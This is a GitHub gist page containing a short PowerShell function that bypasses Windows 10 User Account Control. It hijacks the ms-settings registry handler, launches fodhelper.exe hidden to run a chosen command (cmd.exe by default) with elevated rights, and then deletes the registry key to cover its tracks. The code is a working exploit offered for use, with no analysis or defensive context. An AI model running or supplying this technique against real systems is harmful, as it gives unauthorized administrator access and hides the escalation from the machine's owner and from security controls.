-
-
Save fucksophie/b3a2dbb2f4c3c6db9ffed608f7963b83 to your computer and use it in GitHub Desktop.
Bypass UAC via Fodhelper binary in Windows 10 systems
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function FodhelperUACBypass(){ | |
| Param ( | |
| [String]$program = "cmd /c start C:\Windows\System32\cmd.exe" #default | |
| ) | |
| New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force | |
| New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force | |
| Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force | |
| #Start fodhelper.exe | |
| Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden | |
| #Cleanup | |
| Start-Sleep 3 | |
| Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment